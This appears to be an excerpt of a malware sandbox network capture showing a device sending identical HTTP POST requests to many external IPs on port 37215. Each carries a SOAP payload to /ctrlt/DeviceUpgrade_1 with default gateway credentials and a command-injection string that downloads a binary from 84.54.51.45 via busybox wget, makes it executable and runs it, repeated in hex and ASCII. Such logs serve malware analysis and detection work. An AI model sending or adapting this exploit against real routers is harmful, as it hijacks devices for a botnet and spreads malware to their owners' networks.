                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            57192.168.2.155900441.166.58.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732665062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            58192.168.2.153426841.186.153.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732695103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            59192.168.2.154760241.212.255.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732726097 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            60192.168.2.153356641.32.44.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732749939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            61192.168.2.155432841.212.40.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732812881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            62192.168.2.155606241.38.129.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732815027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            63192.168.2.155765041.107.96.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732825994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            64192.168.2.155215041.43.22.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732847929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            65192.168.2.155694641.116.80.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732903957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            66192.168.2.155076041.227.2.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732956886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
